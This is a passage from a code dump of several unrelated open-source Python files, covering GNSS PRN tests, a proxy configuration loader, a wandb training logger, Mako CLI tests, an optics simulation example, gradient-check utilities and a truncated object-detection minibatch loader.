for port in const["ports"]:
extra = {
"const_name" : 'PortLocation',
"location" : const["location"],
"terminal_name" : port
}
pnr_const.append(extra)
elif const["const_name"] == 'MultiConnection':
for net in const["nets"]:
extra = {
"const_name": 'Multi_Connection',
"multi_number": int(const["multiplier"]),
"net_name": net.upper() # TODO: Revert after case sensitivity is restored
}
pnr_const.append(extra)
elif const["const_name"] == 'NetConst':
for net in const["nets"]:
if 'shield' in const and 'criticality' in const and not const['shield'] == "None":
extra = {
"const_name" : 'ShieldNet',
"net_name" : net,
"shield_net" : const["shield"]
}
pnr_const.append(extra)
extra = {
"const_name" : 'CritNet',
"net_name" : net,
"priority" : const["criticality"]
}
pnr_const.append(extra)
                    elif 'shield' in const and not const['shield'] == "None":
extra = {
"const_name" : 'ShieldNet',
"net_name" : net,
"shield_net" : const["shield"]
}
pnr_const.append(extra)
                    elif 'criticality' in const and const['shield'] == "None":
extra = {
"const_name" : 'CritNet',
"net_name" : net,
"priority" : const["criticality"]
}
pnr_const.append(extra)
logger.debug(f"Const mapped to PnR const format {pnr_const}")
return {'constraints': pnr_const}
def _map_pins(self,pins:list):
blocks=[]
for pin in pins:
if '/' in pin:
temp = {
"type":"pin",
"name":pin.split('/')[0],
"pin":pin.split('/')[1]
}
else:
temp = {
"type":"terminal",
"name":pin,
"pin":None
}
blocks.append(temp)
return blocks
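# Sketch of the pin mapping performed by _map_pins above (illustrative; instance
# and pin names are placeholders): entries of the form "block/pin" become pin
# records, bare names become terminal records.
#
#   PnRConstraintWriter()._map_pins(['MN1/D', 'VOUT'])
#   # -> [{'type': 'pin', 'name': 'MN1', 'pin': 'D'},
#   #     {'type': 'terminal', 'name': 'VOUT', 'pin': None}]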
|
tests/test_prns.py | mfkiwl/laika-gnss | 365 | 21933 | <gh_stars>100-1000
import unittest
from laika.helpers import get_constellation, get_prn_from_nmea_id, \
get_nmea_id_from_prn, NMEA_ID_RANGES
SBAS_DATA = [
['S01', 33],
['S02', 34],
['S10', 42],
['S22', 54],
['S23', 55],
['S32', 64],
['S33', 120],
['S64', 151],
['S65', 152],
['S71', 158]
]
MAIN_CONSTELLATIONS = [
['G01', 1],
['G10', 10],
['G32', 32],
['R01', 65],
['R10', 74],
['R23', 87],
['R24', 88],
['R25', 89],
['R32', 96],
['E01', 301],
['E02', 302],
['E36', 336],
['C01', 201],
['C02', 202],
['C29', 229],
['J01', 193],
['J04', 196]
]
class TestConstellationPRN(unittest.TestCase):
def test_constellation_from_valid_prn(self):
data = [
['G01', 'GPS'],
['G10', 'GPS'],
['G32', 'GPS'],
['R01', 'GLONASS'],
['R10', 'GLONASS'],
['R23', 'GLONASS'],
['R24', 'GLONASS'],
['R25', 'GLONASS'],
['R32', 'GLONASS'],
['E01', 'GALILEO'],
['E02', 'GALILEO'],
['E36', 'GALILEO'],
['C01', 'BEIDOU'],
['C02', 'BEIDOU'],
['C29', 'BEIDOU'],
['J01', 'QZNSS'],
['J04', 'QZNSS'],
['S01', 'SBAS'],
['I01', 'IRNSS']
]
for prn, expected_constellation in data:
constellation = get_constellation(prn)
self.assertEqual(constellation, expected_constellation)
def test_constellation_from_prn_with_invalid_identifier(self):
prn = '?01'
self.assertWarns(UserWarning, get_constellation, prn)
self.assertIsNone(get_constellation(prn))
def test_constellation_from_prn_outside_range(self):
prn = 'G99'
constellation = get_constellation(prn)
self.assertEqual(constellation, 'GPS')
def test_prn_from_nmea_id_for_main_constellations(self):
data = MAIN_CONSTELLATIONS
for expected_prn, nmea_id in data:
prn = get_prn_from_nmea_id(nmea_id)
self.assertEqual(prn, expected_prn)
def test_prn_from_nmea_id_for_SBAS(self):
'''Probably numbering SBAS as single constellation doesn't make
        sense, but programmatically it works the same as for other
constellations.'''
data = SBAS_DATA
for expected_prn, nmea_id in data:
prn = get_prn_from_nmea_id(nmea_id)
self.assertEqual(prn, expected_prn)
def test_prn_from_invalid_nmea_id(self):
data = [
(-1, "?-1"),
(0, "?0"),
(100, "?100"),
(160, "?160"),
(190, "?190"),
(300, "?300")
]
for nmea_id, expected_prn in data:
self.assertWarns(UserWarning, get_prn_from_nmea_id, nmea_id)
self.assertEqual(get_prn_from_nmea_id(nmea_id), expected_prn)
self.assertRaises(TypeError, get_prn_from_nmea_id, None)
self.assertRaises(TypeError, get_prn_from_nmea_id, '1')
def test_nmea_id_from_prn_for_main_constellations(self):
data = MAIN_CONSTELLATIONS
for prn, expected_nmea_id in data:
nmea_id = get_nmea_id_from_prn(prn)
self.assertEqual(nmea_id, expected_nmea_id)
def test_nmea_id_from_prn_for_SBAS(self):
'''Probably numbering SBAS as single constellation doesn't make
        sense, but programmatically it works the same as for other
constellations.'''
data = SBAS_DATA
for prn, expected_nmea_id in data:
nmea_id = get_nmea_id_from_prn(prn)
self.assertEqual(nmea_id, expected_nmea_id)
def test_nmea_id_from_invalid_prn(self):
# Special unknown constellation - valid number
self.assertEqual(1, get_nmea_id_from_prn('?01'))
self.assertEqual(-1, get_nmea_id_from_prn('?-1'))
# Special unknown constellation - invalid number
self.assertRaises(ValueError, get_nmea_id_from_prn, '???')
        # Constellation with unknown identifier
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'X01')
# Valid constellation - invalid number
self.assertRaises(ValueError, get_nmea_id_from_prn, 'G00')
self.assertRaises(ValueError, get_nmea_id_from_prn, 'GAA')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'G33')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'C99')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'R99')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'J99')
# None
self.assertRaises(TypeError, get_nmea_id_from_prn, None)
def test_nmea_ranges_are_valid(self):
last_end = 0
for entry in NMEA_ID_RANGES:
self.assertIn('range', entry)
self.assertIn('constellation', entry)
range_ = entry['range']
self.assertEqual(len(range_), 2)
start, end = range_
self.assertLessEqual(start, end)
self.assertLess(last_end, start)
last_end = end
|
lib/exaproxy/configuration.py | oriolarcas/exaproxy | 124 | 21955 | <gh_stars>100-1000
# encoding: utf-8
"""
configuration.py
Created by <NAME> on 2011-11-29.
Copyright (c) 2011-2013 Exa Networks. All rights reserved.
"""
# NOTE: reloading mid-program not possible
import os
import sys
import logging
import pwd
import math
import socket
import struct
_application = None
_config = None
_defaults = None
class ConfigurationError (Exception):
pass
_syslog_name_value = {
'CRITICAL' : logging.CRITICAL,
'ERROR' : logging.ERROR,
'WARNING' : logging.WARNING,
'INFO' : logging.INFO,
'DEBUG' : logging.DEBUG,
}
_syslog_value_name = {
logging.CRITICAL : 'CRITICAL',
logging.ERROR : 'ERROR',
logging.WARNING : 'WARNING',
logging.INFO : 'INFO',
logging.DEBUG : 'DEBUG',
}
class NoneDict (dict):
def __getitem__ (self,name):
return None
nonedict = NoneDict()
home = os.path.normpath(sys.argv[0]) if sys.argv[0].startswith('/') else os.path.normpath(os.path.join(os.getcwd(),sys.argv[0]))
class value (object):
@staticmethod
def nop (_):
return _
@staticmethod
def syslog (log):
if log not in _syslog_name_value:
raise TypeError('invalid log level %s' % log)
return _syslog_name_value[log]
@staticmethod
def root (path):
roots = home.split(os.sep)
location = []
for index in range(len(roots)-1,-1,-1):
if roots[index] in ('lib','bin'):
if index:
location = roots[:index]
break
root = os.path.join(*location)
paths = [
os.path.normpath(os.path.join(os.path.join(os.sep,root,path))),
os.path.normpath(os.path.expanduser(value.unquote(path))),
os.path.normpath(os.path.join('/',path)),
os.path.normpath(os.path.join('/','usr',path)),
]
return paths
@staticmethod
def integer (_):
value = int(_)
if value <= 0:
raise TypeError('the value must be positive')
return value
@staticmethod
def lowunquote (_):
return _.strip().strip('\'"').lower()
@staticmethod
def unquote (_):
return _.strip().strip('\'"')
@staticmethod
def boolean (_):
return _.lower() in ('1','yes','on','enable','true')
@staticmethod
def list (_):
return _.split()
@staticmethod
def ports (_):
try:
return [int(x) for x in _.split()]
except ValueError:
raise TypeError('resolv.conf can not be found (are you using DHCP without any network setup ?)')
@staticmethod
def methods (_):
return _.upper().split()
@staticmethod
def user (_):
try:
pwd.getpwnam(_)
# uid = answer[2]
except KeyError:
raise TypeError('user %s is not found on this system' % _)
return _
@staticmethod
def folder(path):
paths = value.root(path)
options = [path for path in paths if os.path.exists(path)]
if not options: raise TypeError('%s does not exists' % path)
first = options[0]
if not first: raise TypeError('%s does not exists' % first)
return first
@staticmethod
def conf(path):
first = value.folder(path)
if not os.path.isfile(first): raise TypeError('%s is not a file' % path)
return first
@staticmethod
def resolver(path):
global _application
paths = value.root('etc/%s/dns/resolv.conf' % _application)
paths.append(os.path.normpath(os.path.join('/','etc','resolv.conf')))
paths.append(os.path.normpath(os.path.join('/','var','run','resolv.conf')))
for resolver in paths:
if os.path.exists(resolver):
with open(resolver) as r:
if 'nameserver' in (line.strip().split(None,1)[0].lower() for line in r.readlines() if line.strip()):
return resolver
raise TypeError('resolv.conf can not be found (are you using DHCP without any network setup ?)')
@staticmethod
def exe (path):
argv = path.split(' ',1)
program = value.conf(argv.pop(0))
if not os.access(program, os.X_OK):
raise TypeError('%s is not an executable' % program)
return program if not argv else '%s %s' % (program,argv[0])
@staticmethod
def services (string):
try:
services = []
for service in value.unquote(string).split():
host,port = service.split(':')
services.append((host,int(port)))
return services
except ValueError:
raise TypeError('resolv.conf can not be found (are you using DHCP without any network setup ?)')
@staticmethod
def ranges (string):
try:
ranges = []
for service in value.unquote(string).split():
network,netmask = service.split('/')
if ':' in network:
high,low = struct.unpack('!QQ',socket.inet_pton(socket.AF_INET6,network))
start = (high << 64) + low
end = start + pow(2,128-int(netmask)) - 1
ranges.append((6,start,end))
else:
start = struct.unpack('!L',socket.inet_pton(socket.AF_INET,network))[0]
end = start + pow(2,32-int(netmask)) - 1
ranges.append((4,start,end))
return ranges
except ValueError:
raise TypeError('Can not parse the data as IP range')
@staticmethod
def redirector (name):
if name == 'url' or name.startswith('icap://'):
return name
raise TypeError('invalid redirector protocol %s, options are url or header' % name)
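# Rough behaviour sketch for the converters above (illustrative comments only; the
# numeric bounds are the 32-bit integers spanned by the given CIDR block):
#
#   value.ranges('10.0.0.0/24')   # -> [(4, 167772160, 167772415)]
#   value.services('127.0.0.1:3128 10.0.0.1:8080')
#   # -> [('127.0.0.1', 3128), ('10.0.0.1', 8080)]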
class string (object):
@staticmethod
def nop (_):
return _
@staticmethod
def syslog (log):
if log not in _syslog_value_name:
raise TypeError('invalid log level %s' % log)
return _syslog_value_name[log]
@staticmethod
def quote (_):
return "'%s'" % str(_)
@staticmethod
def lower (_):
return str(_).lower()
@staticmethod
def path (path):
split = sys.argv[0].split('lib/%s' % _application)
if len(split) > 1:
prefix = os.sep.join(split[:1])
if prefix and path.startswith(prefix):
path = path[len(prefix):]
home = os.path.expanduser('~')
if path.startswith(home):
return "'~%s'" % path[len(home):]
return "'%s'" % path
@staticmethod
def list (_):
return "'%s'" % ' '.join((str(x) for x in _))
@staticmethod
def services (_):
l = ' '.join(('%s:%d' % (host,port) for host,port in _))
return "'%s'" % l
@staticmethod
def ranges (_):
def convert ():
for (proto,start,end) in _:
bits = int(math.log(end-start+1,2))
if proto == 4:
network = socket.inet_ntop(socket.AF_INET,struct.pack('!L',start))
yield '%s/%d' % (network,32-bits)
else:
high = struct.pack('!Q',start >> 64)
low = struct.pack('!Q',start & 0xFFFFFFFF)
network = socket.inet_ntop(socket.AF_INET6,high+low)
yield '%s/%d' % (network,128-bits)
return "'%s'" % ' '.join(convert())
import ConfigParser
class Store (dict):
def __getitem__ (self,key):
return dict.__getitem__(self,key.replace('_','-'))
def __setitem__ (self,key,value):
return dict.__setitem__(self,key.replace('_','-'),value)
def __getattr__ (self,key):
return dict.__getitem__(self,key.replace('_','-'))
def __setattr__ (self,key,value):
return dict.__setitem__(self,key.replace('_','-'),value)
def _configuration (conf):
location = os.path.join(os.sep,*os.path.join(home.split(os.sep)))
while location and location != '/':
location, directory = os.path.split(location)
if directory in ('lib','bin'):
break
_conf_paths = []
if conf:
_conf_paths.append(os.path.abspath(os.path.normpath(conf)))
if location:
_conf_paths.append(os.path.normpath(os.path.join(location,'etc',_application,'%s.conf' % _application)))
_conf_paths.append(os.path.normpath(os.path.join('/','etc',_application,'%s.conf' % _application)))
_conf_paths.append(os.path.normpath(os.path.join('/','usr','etc',_application,'%s.conf' % _application)))
configuration = Store()
ini = ConfigParser.ConfigParser()
ini_files = [path for path in _conf_paths if os.path.exists(path)]
if ini_files:
ini.read(ini_files[0])
for section in _defaults:
default = _defaults[section]
for option in default:
convert = default[option][0]
try:
proxy_section = '%s.%s' % (_application,section)
env_name = '%s.%s' % (proxy_section,option)
rep_name = env_name.replace('.','_')
if env_name in os.environ:
conf = os.environ.get(env_name)
elif rep_name in os.environ:
conf = os.environ.get(rep_name)
else:
try:
# raise and set the default
conf = value.unquote(ini.get(section,option,nonedict))
except (ConfigParser.NoSectionError,ConfigParser.NoOptionError):
# raise and set the default
conf = value.unquote(ini.get(proxy_section,option,nonedict))
# name without an = or : in the configuration and no value
if conf is None:
conf = default[option][2]
except (ConfigParser.NoSectionError,ConfigParser.NoOptionError):
conf = default[option][2]
try:
configuration.setdefault(section,Store())[option] = convert(conf)
except TypeError,error:
raise ConfigurationError('invalid value for %s.%s : %s (%s)' % (section,option,conf,str(error)))
return configuration
def load (application=None,defaults=None,conf=None):
global _application
global _defaults
global _config
if _config:
return _config
if conf is None:
raise RuntimeError('You can not have an import using load() before main() initialised it')
_application = application
_defaults = defaults
_config = _configuration(conf)
return _config
def default ():
for section in sorted(_defaults):
for option in sorted(_defaults[section]):
values = _defaults[section][option]
default = "'%s'" % values[2] if values[1] in (string.list,string.path,string.quote) else values[2]
yield '%s.%s.%s %s: %s. default (%s)' % (_application,section,option,' '*(20-len(section)-len(option)),values[3],default)
def ini (diff=False):
for section in sorted(_config):
if section in ('proxy','debug'):
continue
header = '\n[%s]' % section
for k in sorted(_config[section]):
v = _config[section][k]
if diff and _defaults[section][k][0](_defaults[section][k][2]) == v:
continue
if header:
print header
header = ''
print '%s = %s' % (k,_defaults[section][k][1](v))
def env (diff=False):
print
for section,values in _config.items():
if section in ('proxy','debug'):
continue
for k,v in values.items():
if diff and _defaults[section][k][0](_defaults[section][k][2]) == v:
continue
if _defaults[section][k][1] == string.quote:
print "%s.%s.%s='%s'" % (_application,section,k,v)
continue
print "%s.%s.%s=%s" % (_application,section,k,_defaults[section][k][1](v))
|
kili/mutations/project_version/fragments.py | ASonay/kili-playground | 214 | 21964 | <reponame>ASonay/kili-playground
"""
Fragments of project version mutations
"""
PROJECT_VERSION_FRAGMENT = '''
content
id
name
projectId
'''
|
packnet_sfm/loggers/wandb_logger.py | asmith9455/packnet-sfm | 982 | 22004 | # Copyright 2020 Toyota Research Institute. All rights reserved.
# Adapted from Pytorch-Lightning
# https://github.com/PyTorchLightning/pytorch-lightning/blob/master/pytorch_lightning/loggers/wandb.py
from argparse import Namespace
from collections import OrderedDict
import numpy as np
import torch.nn as nn
import wandb
from wandb.wandb_run import Run
from packnet_sfm.utils.depth import viz_inv_depth
from packnet_sfm.utils.logging import prepare_dataset_prefix
from packnet_sfm.utils.types import is_dict, is_tensor
class WandbLogger:
"""
Wandb logger class to monitor training.
Parameters
----------
name : str
Run name (if empty, uses a fancy Wandb name, highly recommended)
dir : str
Folder where wandb information is stored
id : str
ID for the run
anonymous : bool
Anonymous mode
version : str
Run version
project : str
Wandb project where the run will live
tags : list of str
List of tags to append to the run
log_model : bool
Log the model to wandb or not
experiment : wandb
Wandb experiment
entity : str
Wandb entity
"""
def __init__(self,
name=None, dir=None, id=None, anonymous=False,
version=None, project=None, entity=None,
tags=None, log_model=False, experiment=None
):
super().__init__()
self._name = name
self._dir = dir
self._anonymous = 'allow' if anonymous else None
self._id = version or id
self._tags = tags
self._project = project
self._entity = entity
self._log_model = log_model
self._experiment = experiment if experiment else self.create_experiment()
self._metrics = OrderedDict()
def __getstate__(self):
"""Get the current logger state"""
state = self.__dict__.copy()
state['_id'] = self._experiment.id if self._experiment is not None else None
state['_experiment'] = None
return state
def create_experiment(self):
"""Creates and returns a new experiment"""
experiment = wandb.init(
name=self._name, dir=self._dir, project=self._project,
anonymous=self._anonymous, reinit=True, id=self._id,
resume='allow', tags=self._tags, entity=self._entity
)
wandb.run.save()
return experiment
def watch(self, model: nn.Module, log: str = 'gradients', log_freq: int = 100):
"""Watch training parameters."""
self.experiment.watch(model, log=log, log_freq=log_freq)
@property
def experiment(self) -> Run:
"""Returns the experiment (creates a new if it doesn't exist)."""
if self._experiment is None:
self._experiment = self.create_experiment()
return self._experiment
@property
def version(self) -> str:
"""Returns experiment version."""
return self._experiment.id if self._experiment else None
@property
def name(self) -> str:
"""Returns experiment name."""
name = self._experiment.project_name() if self._experiment else None
return name
@property
def run_name(self) -> str:
"""Returns run name."""
return wandb.run.name if self._experiment else None
@property
def run_url(self) -> str:
"""Returns run URL."""
return 'https://app.wandb.ai/{}/{}/runs/{}'.format(
wandb.run.entity, wandb.run.project, wandb.run.id) if self._experiment else None
@staticmethod
def _convert_params(params):
if isinstance(params, Namespace):
params = vars(params)
if params is None:
params = {}
return params
def log_config(self, params):
"""Logs model configuration."""
params = self._convert_params(params)
self.experiment.config.update(params, allow_val_change=True)
def log_metrics(self, metrics):
"""Logs training metrics."""
self._metrics.update(metrics)
if 'global_step' in metrics:
self.experiment.log(self._metrics)
self._metrics.clear()
def log_images(self, func, mode, batch, output,
args, dataset, world_size, config):
"""
Adds images to metrics for later logging.
Parameters
----------
func : Function
Function used to process the image before logging
mode : str {"train", "val"}
Training stage where the images come from (serve as prefix for logging)
batch : dict
Data batch
output : dict
Model output
args : tuple
Step arguments
dataset : CfgNode
Dataset configuration
world_size : int
Number of GPUs, used to get logging samples at consistent intervals
config : CfgNode
Model configuration
"""
dataset_idx = 0 if len(args) == 1 else args[1]
prefix = prepare_dataset_prefix(config, dataset_idx)
interval = len(dataset[dataset_idx]) // world_size // config.num_logs
if args[0] % interval == 0:
prefix_idx = '{}-{}-{}'.format(mode, prefix, batch['idx'][0].item())
func(prefix_idx, batch, output)
# Log depth images
def log_depth(self, *args, **kwargs):
"""Helper function used to log images relevant for depth estimation"""
def log(prefix_idx, batch, output):
self._metrics.update(log_rgb('rgb', prefix_idx, batch))
self._metrics.update(log_inv_depth('inv_depth', prefix_idx, output))
if 'depth' in batch:
self._metrics.update(log_depth('depth', prefix_idx, batch))
self.log_images(log, *args, **kwargs)
def log_rgb(key, prefix, batch, i=0):
"""
Converts an RGB image from a batch for logging
Parameters
----------
key : str
Key from data containing the image
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the image
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
rgb = batch[key] if is_dict(batch) else batch
return prep_image(prefix, key,
rgb[i])
def log_depth(key, prefix, batch, i=0):
"""
Converts a depth map from a batch for logging
Parameters
----------
key : str
Key from data containing the depth map
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the depth map
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
depth = batch[key] if is_dict(batch) else batch
inv_depth = 1. / depth[i]
inv_depth[depth[i] == 0] = 0
return prep_image(prefix, key,
viz_inv_depth(inv_depth, filter_zeros=True))
def log_inv_depth(key, prefix, batch, i=0):
"""
Converts an inverse depth map from a batch for logging
Parameters
----------
key : str
Key from data containing the inverse depth map
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the inverse depth map
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
inv_depth = batch[key] if is_dict(batch) else batch
return prep_image(prefix, key,
viz_inv_depth(inv_depth[i]))
def prep_image(prefix, key, image):
"""
Prepare image for wandb logging
Parameters
----------
prefix : str
Prefix added to the key for logging
key : str
Key from data containing the inverse depth map
image : torch.Tensor [3,H,W]
Image to be logged
Returns
-------
output : dict
Dictionary with key and value for logging
"""
if is_tensor(image):
image = image.detach().permute(1, 2, 0).cpu().numpy()
prefix_key = '{}-{}'.format(prefix, key)
return {prefix_key: wandb.Image(image, caption=key)}
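# Minimal usage sketch (illustrative, not part of the module): the run/project
# names are placeholders and a wandb account or anonymous mode is assumed; `model`
# stands for any torch.nn.Module.
#
#   logger = WandbLogger(name='debug-run', project='packnet-sfm-sandbox', anonymous=True)
#   logger.log_config({'lr': 2e-4, 'batch_size': 4})
#   logger.log_metrics({'loss': 0.123, 'global_step': 10})  # flushes because 'global_step' is present
#   logger.watch(model)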
|
desktop/core/ext-py/Mako-1.0.7/test/test_cmd.py | kokosing/hue | 5,079 | 22008 | from __future__ import with_statement
from contextlib import contextmanager
from test import TemplateTest, eq_, raises, template_base, mock
import os
from mako.cmd import cmdline
class CmdTest(TemplateTest):
@contextmanager
def _capture_output_fixture(self, stream="stdout"):
with mock.patch("sys.%s" % stream) as stdout:
yield stdout
def test_stdin_success(self):
with self._capture_output_fixture() as stdout:
with mock.patch("sys.stdin", mock.Mock(
read=mock.Mock(return_value="hello world ${x}"))):
cmdline(["--var", "x=5", "-"])
eq_(stdout.write.mock_calls[0][1][0], "hello world 5")
def test_stdin_syntax_err(self):
with mock.patch("sys.stdin", mock.Mock(
read=mock.Mock(return_value="${x"))):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5", "-"])
assert "SyntaxException: Expected" in \
stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_stdin_rt_err(self):
with mock.patch("sys.stdin", mock.Mock(
read=mock.Mock(return_value="${q}"))):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5", "-"])
assert "NameError: Undefined" in stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_file_success(self):
with self._capture_output_fixture() as stdout:
cmdline(["--var", "x=5",
os.path.join(template_base, "cmd_good.mako")])
eq_(stdout.write.mock_calls[0][1][0], "hello world 5")
def test_file_syntax_err(self):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5",
os.path.join(template_base, "cmd_syntax.mako")])
assert "SyntaxException: Expected" in stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_file_rt_err(self):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5",
os.path.join(template_base, "cmd_runtime.mako")])
assert "NameError: Undefined" in stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_file_notfound(self):
with raises(SystemExit, "error: can't find fake.lalala"):
cmdline(["--var", "x=5", "fake.lalala"])
|
sphinx-sources/Examples/Commands/LensFresnel_Convert.py | jccmak/lightpipes | 132 | 22010 | from LightPipes import *
import matplotlib.pyplot as plt
def TheExample(N):
fig=plt.figure(figsize=(11,9.5))
ax1 = fig.add_subplot(221)
ax2 = fig.add_subplot(222)
ax3 = fig.add_subplot(223)
ax4 = fig.add_subplot(224)
labda=1000*nm;
size=10*mm;
f1=10*m
f2=1.11111111*m
z=1.0*m
w=5*mm;
F=Begin(size,labda,N);
F=RectAperture(w,w,0,0,0,F);
#1) Using Lens and Fresnel:
F1=Lens(z,0,0,F)
F1=Fresnel(z,F1)
phi1=Phase(F1);phi1=PhaseUnwrap(phi1)
I1=Intensity(0,F1);
x1=[]
for i in range(N):
x1.append((-size/2+i*size/N)/mm)
#2) Using Lens + LensFresnel and Convert:
F2=Lens(f1,0,0,F);
F2=LensFresnel(f2,z,F2);
F2=Convert(F2);
phi2=Phase(F2);phi2=PhaseUnwrap(phi2)
I2=Intensity(0,F2);
x2=[]
newsize=size/10
for i in range(N):
x2.append((-newsize/2+i*newsize/N)/mm)
ax1.plot(x1,phi1[int(N/2)],'k--',label='Lens + Fresnel')
ax1.plot(x2,phi2[int(N/2)],'k',label='LensFresnel + Convert');
ax1.set_xlim(-newsize/2/mm,newsize/2/mm)
ax1.set_ylim(-2,4)
ax1.set_xlabel('x [mm]');
ax1.set_ylabel('phase [rad]');
ax1.set_title('phase, N = %d' %N)
legend = ax1.legend(loc='upper center', shadow=True)
ax2.plot(x1,I1[int(N/2)],'k--',label='Lens+Fresnel')
ax2.plot(x2,I2[int(N/2)], 'k',label='LensFresnel + Convert');
ax2.set_xlim(-newsize/2/mm,newsize/2/mm)
ax2.set_ylim(0,1000)
ax2.set_xlabel('x [mm]');
ax2.set_ylabel('Intensity [a.u.]');
ax2.set_title('intensity, N = %d' %N)
legend = ax2.legend(loc='upper center', shadow=True)
ax3.imshow(I1);ax3.axis('off');ax3.set_title('Intensity, Lens + Fresnel, N = %d' %N)
ax3.set_xlim(int(N/2)-N/20,int(N/2)+N/20)
ax3.set_ylim(int(N/2)-N/20,int(N/2)+N/20)
ax4.imshow(I2);ax4.axis('off');ax4.set_title('Intensity, LensFresnel + Convert, N = %d' %N)
plt.show()
TheExample(100) #100 x 100 grid
TheExample(1000) #1000 x 1000 grid
|
cpu_ver/funkyyak/tests/test_util.py | bigaidream-projects/drmad | 119 | 22035 | <gh_stars>100-1000
import numpy as np
import itertools as it
from funkyyak import grad
from copy import copy
def nd(f, *args):
unary_f = lambda x : f(*x)
return unary_nd(unary_f, args)
def unary_nd(f, x):
eps = 1e-4
if isinstance(x, np.ndarray):
nd_grad = np.zeros(x.shape)
for dims in it.product(*map(range, x.shape)):
nd_grad[dims] = unary_nd(indexed_function(f, x, dims), x[dims])
return nd_grad
elif isinstance(x, tuple):
return tuple([unary_nd(indexed_function(f, list(x), i), x[i])
for i in range(len(x))])
elif isinstance(x, dict):
return {k : unary_nd(indexed_function(f, x, k), v) for k, v in x.iteritems()}
elif isinstance(x, list):
return [unary_nd(indexed_function(f, x, i), v) for i, v in enumerate(x)]
else:
return (f(x + eps/2) - f(x - eps/2)) / eps
def indexed_function(fun, arg, index):
local_arg = copy(arg)
def partial_function(x):
local_arg[index] = x
return fun(local_arg)
return partial_function
def eq_class(dtype):
return float if dtype == np.float64 else dtype
def check_equivalent(A, B):
assert eq_class(type(A)) == eq_class(type(B)),\
"Types are: {0} and {1}".format(eq_class(type(A)), eq_class(type(B)))
if isinstance(A, (tuple, list)):
for a, b in zip(A, B): check_equivalent(a, b)
elif isinstance(A, dict):
assert len(A) == len(B)
for k in A: check_equivalent(A[k], B[k])
else:
if isinstance(A, np.ndarray):
assert A.shape == B.shape, "Shapes are {0} and {1}".format(A.shape, B.shape)
assert np.allclose(A, B, rtol=1e-4, atol=1e-6), "Diffs are: {0}".format(A - B)
def check_grads(fun, *args):
A = nd(fun, *args)
B = tuple([grad(fun, i)(*args) for i in range(len(args))])
check_equivalent(A, B)
def to_scalar(x):
return np.sum(np.sin(x))
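# Example check (illustrative): compare FunkyYak gradients against the numerical
# gradients computed above for a simple scalar function of one array argument.
#
#   fun = lambda x: to_scalar(np.tanh(x))
#   check_grads(fun, np.random.randn(5))   # asserts analytic and numeric grads agree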
|
auto_ml/_version.py | amlanbanerjee/auto_ml | 1,671 | 22042 | <filename>auto_ml/_version.py
__version__ = "2.9.10"
|
lib/roi_data/minibatch.py | BarneyQiao/pcl.pytorch | 233 | 22056 | <reponame>BarneyQiao/pcl.pytorch<gh_stars>100-1000
import numpy as np
import numpy.random as npr
import cv2
from core.config import cfg
import utils.blob as blob_utils
def get_minibatch_blob_names(is_training=True):
"""Return blob names in the order in which they are read by the data loader.
"""
# data blob: holds a batch of N images, each with 3 channels
blob_names = ['data', 'rois', 'labels']
return blob_names
def get_minibatch(roidb, num_classes):
"""Given a roidb, construct a minibatch sampled from it."""
# We collect blobs from each image onto a list and then concat them into a
# single tensor, hence we initialize each blob to an empty list
blobs = {k: [] for k in get_minibatch_blob_names()}
# Get the input image blob
im_blob, im_scales = _get_image_blob(roidb)
assert len(im_scales) == 1, "Single batch only"
assert len(roidb) == 1, "Single batch only"
blobs['data'] = im_blob
rois_blob = np.zeros((0, 5), dtype=np.float32)
labels_blob = np.zeros((0, num_classes), dtype=np.float32)
num_images = len(roidb)
for im_i in range(num_images):
labels, im_rois = _sample_rois(roidb[im_i], num_classes)
# Add to RoIs blob
rois = _project_im_rois(im_rois, im_scales[im_i])
batch_ind = im_i * np.ones((rois.shape[0], 1))
rois_blob_this_image = np.hstack((batch_ind, rois))
if cfg.DEDUP_BOXES > 0:
v = np.array([1, 1e3, 1e6, 1e9, 1e12])
hashes = np.round(rois_blob_this_image * cfg.DEDUP_BOXES).dot(v)
_, index, inv_index = np.unique(hashes, return_index=True,
return_inverse=True)
rois_blob_this_image = rois_blob_this_image[index, :]
rois_blob = np.vstack((rois_blob, rois_blob_this_image))
# Add to labels blob
labels_blob = np.vstack((labels_blob, labels))
blobs['rois'] = rois_blob
blobs['labels'] = labels_blob
return blobs, True
def _sample_rois(roidb, num_classes):
"""Generate a random sample of RoIs"""
labels = roidb['gt_classes']
rois = roidb['boxes']
if cfg.TRAIN.BATCH_SIZE_PER_IM > 0:
batch_size = cfg.TRAIN.BATCH_SIZE_PER_IM
else:
batch_size = np.inf
if batch_size < rois.shape[0]:
rois_inds = npr.permutation(rois.shape[0])[:batch_size]
rois = rois[rois_inds, :]
return labels.reshape(1, -1), rois
def _get_image_blob(roidb):
"""Builds an input blob from the images in the roidb at the specified
scales.
"""
num_images = len(roidb)
# Sample random scales to use for each image in this batch
scale_inds = np.random.randint(
0, high=len(cfg.TRAIN.SCALES), size=num_images)
processed_ims = []
im_scales = []
for i in range(num_images):
im = cv2.imread(roidb[i]['image'])
assert im is not None, \
'Failed to read image \'{}\''.format(roidb[i]['image'])
# If NOT using opencv to read in images, uncomment following lines
# if len(im.shape) == 2:
# im = im[:, :, np.newaxis]
# im = np.concatenate((im, im, im), axis=2)
